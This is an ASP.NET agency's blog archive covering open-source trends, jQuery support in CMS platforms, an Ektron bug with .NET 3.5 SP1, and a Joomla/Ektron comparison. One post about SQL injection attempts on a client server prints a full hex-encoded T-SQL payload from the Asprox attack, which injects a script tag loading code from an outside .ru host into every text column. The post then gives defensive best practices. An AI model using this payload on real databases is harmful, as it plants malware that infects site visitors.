Archive

Posts Tagged ‘ASP.NET’

2009, the year of Open Source Software

January 7th, 2009
Comments Off

We are lucky to live in our times. No, it is not fun going through (steep) downturn economy. But it is exciting to see the changes that such a recession will bring. One of the exciting changes that I predict for 2009 is a general boost to open source projects: increased usage and adoption by corporations while communities and ecosystems grow. Perhaps even to a point of competition with commercial products (in some cases). This is another question by itself: Can an open source project compete with a commercial product?

This year, 2009, we will see how open source projects will make huge strides and erase the gap with commercial projects, if not gain an advantage over them. Here is why:

1. Unbeatable Price: free! I know, it is not entirely true, you still need services around open source products and arguably more than in commercial products. But as the market learns to adopt more and more open source products the TCO can be lower with open source than commercial products, especially if you have the right team on your side.

2. Gain from the ‘wisdom of the crowd’, instead of wisdom of one as is often the case with commercial products. We see examples of this all over, in particular in the web development industry: Umbraco is gaining huge marketing share compared with Ektron. Magento Commerce is gaining huge market share over any other open source ecommerce platform and some of the low and mid-level commercial products in the ecommerce industry. Similar thing is happening with ASP.NET: the framework is now adopting the MVC design pattern mostly due to the fact that other platforms like Zend Framework and Ruby are free and product amazing websites. Top it off by the adoption of jQuery in almost any commercial web product today including ASP.NET framework which dumped AJAX.NET in favour of jQuery.

3. This is the sad-but-true part: developers are being laid off and hence join open source projects. It is known that the IT industry lags about 6 months after the indicators have come in, in other words, hi-tech layoffs will continue to come. In any case, more developers will be out of a job and will have plenty of time to collaborate and volunteer in open source projects – a great way to polish a resume…

To summarize, in 2009 we will see a great boost in open source adoption. Now, I am not saying that commercial products will not see any upside this year, but the competition will certainly be tougher then ever before. I am excited to see how it plays out. We certainly are going to focus our energies and our client’s energies on the leaders of each industry. You?

Content Management Systems, eCommerce, Ektron, Magento, Web Development , , , , , , , , ,

A list of CMS and eCommerce systems that officially support jQuery

December 7th, 2008

Last updated: December 7th, 2008.

Recently, jQuery – the agile JavaScript Library – has reached a tipping point. Here is a list of CMS and eCommerce systems that our clients are most interested in and their status with regard to jQuery.

Systems where jQuery is officially supported:

1. Microsoft has adopted jQuery and will offer intellisense support in its dominant IDE: Visual Studio 2008.

2. Umbraco - an open source CMS now offers jQuery by default and using jQueryin Umbraco is a matter of adding a simple call in order to include the jQuery files in the page.

3. Drupal - is an open source CMS and Framework CMS, as of version 5 it offers jQuery streight from its core. There are plans to build a centralized jQuery plugin in Drupal version 7.

4. Typo3 - is an open source CMS Framework. Typo3 has a jQuery extension that allows advanced integration with jQuery.

5. DotNetNuke - an open source ASP.NET CMS. Since October 2008 DotNetNuke offers built in jQuery support beginning with version 5.

Systems where jQuery is not supported:

1. Joomla - seems to favor Mootools over jQuery. Here is an article on how to support jQuery within Joomla and avoid conflicts with other libraries.

2. Zend Framework – the leading PHP Framework following the MVC design pattern. A press release was issued in May 2008 announcing Zend Framework and Dojo partnership.

3. Magento Commerce – an open source eCommerce platform that is gaining huge market share in the eCommerce industry. Currently Magento Commerce supports prototype JS library instead of jQuery, but offers ways to integrate jQuery easily.

4. Zen-Cart - an open source eCommerce (competing with Magento). At the moment Zen-Cart is not supporting any JavaScript library in its core.

Other systems and their relationship to jQuery:

1. WordPress - an open source blogging software. Uses jQuery for its core functionality and is avilable for any third party plugin.

2. Ektron CMS400 – Ektron has an enterprise level CMS with advanced content editing features. Oddly enough, Ektron seems to have embedded their own version of jQuery in their code.

While jQuery seems to be favored the favored JavaScript library by many developers, it has yet to be declared as the default one for many projects and systems. I’ll be keeping this list updated in the following months. Let me know if there is a system that interests you and I did not list it here.

Content Management Systems, eCommerce, Ektron, Joomla, Magento, Web Development, ZenCart , , , , , , , , , , , , , , , ,

jQuery Emerges as Most Popular Javascript Library for Web Development

November 3rd, 2008

It seems to be official: jQuery is gaining ground faster than any other JavaScript Library. There may be many reasons but I like to think that jQuery is leading the pack due to its simplicity and relatively small size. Here is what Google Trends is showing us:

Top Reasons for jQuery’s ground gaining:

  • Simplicity.
  • Small in size: only 15K for latest production release after its minified and gzipped.
  • Extendable: pretty big plugin library. Currently showing hundreds of plugins.
  • CSS3 Compliant and one of the first JS Library to use CSS selectors.
  • Handles AJAX very well while avoiding code bloating.
  • Major adoption by ASP.NET developers and teaming up with ASP.NET’s team for improved integration

jQuery Resources:

Other Javascript Libraries:

All these Javascript frameworks provide the basic idea of single developer resource for cross browser and cross platform JavaScript development. Additionally, all make AJAX a little bit easier:

If you know of any additional interesting jQuery Resources, drop me a line. Thanks!

.NET Framework, AJAX, Web Design, Web Development, Web-based User Interfaces , , , , ,

Ektron CMS400 7.0 issues with .NET Framework 3.5 SP1

October 6th, 2008

After upgrading my development machine with Microsoft .NET Framework 3.5 SP1, I noticed a couple things. First, the installer also updated the .NET Framework 2.0 instance to Service Pack 2.

Second, my instance of Ektron CMS400 v.7.0.4.20 (which runs under .NET Framework 2.0) starting having problems. Specifically, I could no longer create library items in the workarea. Attempting to save a library item, for example, a hyperlink would cause the page to postback and the icon bar to disappear:

The postback page after attempting to save the library item

The postback page after attempting to save the library item

There is no error message, but viewing the library item list reveals that the item was not saved.

The culprit was the page /workarea/library.aspx. Viewing the HTML source of this page when attempting to “Add Library”, the form tag’s action attribute was:

library.aspx

… no querystring parameters; so when the page posts back in Ektron, it can’t save the library item and fails.

Viewing the same page on a system without .NET Framework 3.5 SP1 results in an action attribute like this:

 library.aspx?LangType=1033&action=AddLibraryItem&folder=98&type=images

Some background: As it turns out, the .NET Framework 3.5 SP1 installation changes the way the FORM tag’s ACTION attribute is handled. Prior to this upgrade, ASP.NET would ignore whatever you typed for the form’s action attribute in the markup. ASP.NET would instead render the action attribute to match the original page request. Starting with SP1, the action attribute is no longer ignored and will be rendered exactly as input.

Ektron, as it turns out, supplied an action attribute in the library.aspx form tag. Until the release of this Service Pack, it was ignored by ASP.NET.

Two possible solutions:

This may not be an issue in Ektron CMS400 7.5+, but users of v7.0 should be wary, even if they’re not planning on upgrading .NET Framework 3.5 SP1… Windows Update may upgrade you automatically around November of this year.

.NET Framework, Ektron, Web Development , , , ,

Joomla vs Ektron

September 5th, 2008

We have been receiving a lot of comparison inquiries lately and I wanted to put this simple Joomla vs Ektron content management systems comparison table out there. Have in mind that much of the decision of which CMS to choose for your company or organization is usually made way before this comparison since the two systems are different in such a fundamental level. However, this is a comparison of those fundamentals plus some of the ‘interesting’ features.

Joomla vs Ektron

Joomla vs Ektron

Feature/Item Joomla Ektron
License Model Open Source Closed Source, Compiled
Price Free Starts at $15,000
Web Platform PHP ASP.NET 2.0
Database MySQL MS SQL (Express version OK)
Extendability Options Plugins, Components, Mambots. Joomla 1.5 went through significant development that now offers many hook-ups for plugins without hacking any core files. Plugins (Observer Method), Ektron API (via ASP.NET code behind), Extensive Web Services API
SEO Options Search Engine Friendly URLs (Joomla 1.5)
Meta tags controls
Full template overrides, clean HTML
Search Engine Friendly URLs (CMS400 7.6)
Meta tags controls and consolidation
Content Tagging
Full template overrides, HTML is often not so clean (part issue with .NET as well)
Social Networking None, unless using a third party component or a plugin. Many features built in: Personal profile, personal area, connections between profiles, forums, blogging.

Thoughts?

Content Management Systems, Ektron, Joomla , , , , , , ,

Hack attempt: SQL Injection Tagreting MS SQL Servers

August 19th, 2008
Comments Off

I noticed one of our client’s IIS web servers was getting a lot of SQL Injection attempts this past week. These attacks pass T-SQL code into querystring parameters in hopes that the application is not checking inputs.

Here’s the code: (I removed the SQL exec() statement and replaced it with print so you can see the unencoded SQL.)

DECLARE @S VARCHAR(4000);SET @S=CAST(0x4445434C4152452040542
05641524348415228323535292C4043205641524348415228323535292
04445434C415245205461626C655F437572736F7220435552534F52204
64F522053454C45435420612E6E616D652C622E6E616D652046524F4D2
07379736F626A6563747320612C737973636F6C756D6E7320622057484
5524520612E69643D622E696420414E4420612E78747970653D2775272
0414E442028622E78747970653D3939204F5220622E78747970653D333
5204F5220622E78747970653D323331204F5220622E78747970653D313
63729204F50454E205461626C655F437572736F72204645544348204E4
558542046524F4D205461626C655F437572736F7220494E544F2040542
C4043205748494C4528404046455443485F5354415455533D302920424
547494E20455845432827555044415445205B272B40542B275D2053455
4205B272B40432B275D3D525452494D28434F4E5645525428564152434
841522834303030292C5B272B40432B275D29292B27273C73637269707
4207372633D687474703A2F2F7777772E393868732E72752F6A732E6A73
3E3C2F7363726970743E27272729204645544348204E4558542046524F4
D205461626C655F437572736F7220494E544F2040542C404320454E4420
434C4F5345205461626C655F437572736F72204445414C4C4F434154452
05461626C655F437572736F7220 AS VARCHAR(4000));

print @S;

This particular attack is well known and has been sighted in several variants:

http://aspadvice.com/blogs/programming_shorts/archive/2008/06/27/Asprox-Recovery.aspx

http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx

Using the following web application best practices, we avoid getting hacked:

  • Application level:
    • Never trust user input (e.g. querystring or form posts). Always consider that user input may contain exploit code and check it appropriately.
    • Always use Stored Procedures and/or Parameterized database queries. Don’t build SQL queries using string concatenation.
    • Use typed variables when possible. Converting a querystring parameter to an integer before passing it to a SQL query can inhibit some attacks.
  • Database level:
    • Use limited database permissions. For example, for SQL Server, don’t let you application run under the “sa” user. The database user should only have permission in the particular database used by the application.
    • If possible, disable extended stored procedures such as xp_cmdshell.
    • Don’t use dynamic SQL. Dynamic SQL can be just as bad as building queries using string concatenation.
      Some DBAs have server-wide policies of no Dynamic SQL.

The application level is crucial. Since a web application may someday be moved to a new server, we can’t assume that the web server and database have been configured using best practices.

All layers of security are important, though: If you’re using a third-party or closed-source web application, you may not have access to application code. In that case, the Database and Web Server layers are your last defense against exploits in improperly written code.

.NET Framework, Web Development , , ,

Ektron: Clarification on User Controls vs API

July 30th, 2008
Comments Off

We recently spotted an article from Bill Roger’s blog (Ektron‘s CEO) which discusses usage of the Ektron Server Controls v.s. Ektron’s API. At Activo, we are constantly using both approaches and indeed each approach is a bit different and is used in different situations. The article makes it much clearer that Ektron actually put more effort than we thought before into the Server Controls. Understanding that the Server Controls were made for this sort of usage makes us now feel more secure using this method. Previously, I always thought of this method as a hack and preferred the API.

Frank heads our .NET development team and added the following:

I’ve found it easier to start off with a foundation of one of the server controls and build off of that, rather than using only API calls. The server control acts as a “datareader” which can be used to access the data initially. Many of the custom controls we built to replace XSLT use this model:

  • Add a ListSummary inside the user control/page and set its properties.
  • Access the ListSummary’s EkItems property.
  • Manipulate the data from EkItems, transform it, and output it into a repeater.

This tends to work more reliably than using the API calls. However, if the code needs to bypass the permissions model, the only option is to go direct using the API.

.NET Framework, Ektron, Web Development , , , , ,